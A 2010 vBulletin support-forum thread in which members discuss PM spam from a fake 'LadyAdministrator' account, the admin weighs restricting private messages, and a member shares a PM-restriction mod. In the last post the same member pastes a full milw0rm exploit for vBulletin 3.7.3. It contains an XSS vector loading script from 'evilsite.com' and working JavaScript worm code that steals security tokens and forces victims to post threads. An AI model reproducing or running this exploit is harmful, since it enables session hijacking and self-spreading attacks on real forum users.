USB JTAG  

Go Back   USB JTAG > General > News > Old posts

Closed Thread
 
Thread Tools Display Modes
  #1  
Old 01-26-2010, 06:27 PM
dragonmas dragonmas is offline
Senior Member
 
Join Date: Sep 2005
Posts: 163
Default Spammed

Why are we getting spammed in private message about our computers being infected.????
  #2  
Old 01-26-2010, 06:34 PM
usbbdm usbbdm is offline
Administrator
 
Join Date: Jul 2005
Posts: 8,885
Default

Quote:
Originally Posted by dragonmas View Post
Why are we getting spammed in private message about our computers being infected.????
Can you forward me the PM?
  #3  
Old 01-26-2010, 08:12 PM
dragonmas dragonmas is offline
Senior Member
 
Join Date: Sep 2005
Posts: 163
Default

Deleted but were from LadyAdministrator/LadyX showing as junior member with no posts.
  #4  
Old 01-26-2010, 09:11 PM
usbbdm usbbdm is offline
Administrator
 
Join Date: Jul 2005
Posts: 8,885
Default

He is banned. Can we not allow PM say less then 10 days of registration or 10 post?
  #5  
Old 01-26-2010, 10:05 PM
UserName UserName is offline
Senior Member
 
Join Date: Jun 2008
Posts: 298
Default

sounds good. i have pms off lol
__________________
do not believe what i say 10% its true
  #6  
Old 01-26-2010, 10:29 PM
usbbdm usbbdm is offline
Administrator
 
Join Date: Jul 2005
Posts: 8,885
Default

Should I disable all PMs? There are not a lot of use of PM anyway. If you have question you can ask in the forum.
  #7  
Old 01-27-2010, 02:02 PM
0n3.m4n.4rmy 0n3.m4n.4rmy is offline
Member
 
Join Date: Jan 2009
Posts: 57
Default

usbbdm This is what you need. If you need anything from that site let me know As i have a account to download for there. Usbbdm any issue what so ever with V Bulletin I know about it from A-Z From Security to building forums. You should also update your forums as well.I would also like to let you know there is a SQL Injection for the current ver of vb your running Ill post the source below.



Restrict Private Messages to Public if not Enough Posts


This is a very small mod which will prevent users from sending private messages to anyone except the designated staff group (like admin) if they are below a certain threshold of post count.

Recently I've had two spam attacks in quick succession made via PM to dozens of my users in my community from spammers who verified their email address and didn't bother posting. Those are very annoying to find and clean up via the database, so better to stop it at the source.

There are two settings in the Private Messaging options section, one is the minimum post count needed to have free use of the private message system, and second is the sole usergroup they can contact via private message if they do not meet that minimum. For example, someone might not be able to post due to some technical issue, but still needs to tell the staff about it somehow! Besides, my particular spammers made sure they did not target any staff members...

I made this in about ten minutes to solve my own spam issue, so I will most likely not expand on it, but I will help with whatever minuscule support might be required.



http://www.vbulletin.org/forum/showt...highlight=spam
Attached Files
File Type: rar product-pm_restrict.rar (1.1 KB, 59 views)
  #8  
Old 01-27-2010, 02:16 PM
0n3.m4n.4rmy 0n3.m4n.4rmy is offline
Member
 
Join Date: Jan 2009
Posts: 57
Default vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit

http://milw0rm.com/exploits/7174

2008-11-20 vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit

/* -----------------------------
* Author = Mx
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
* Software = vBulletin
* Addon = Visitor Messages
* Version = 3.7.3
* Attack = XSS/XSRF

- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
+ with the visitor messages addon (a clone of a social network wall/comment area).
- When posting XSS, the data is run through htmlentities(); before being displayed
+ to the general public/forum members. However, when posting a new message,
- a new notification is sent to the commentee. The commenter posts a XSS vector such as
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
+ and I have included an example worm that makes the user post a new thread with your own
- specified subject and message.

* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
* of the attack method.
* ----------------------------- */

function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}

function getAXAH(url){

var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);

function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);

var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);

var subject = 'subject text';
var message = 'message text';

postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New +Thread&signature=1&parseurl=1&emailupdate=0&pollo ptions=4');

}
}
}
}








function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();

theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);

function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {

}
}
}
}


getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');

# milw0rm.com [2008-11-20]
Closed Thread

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT -7. The time now is 02:44 AM.


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.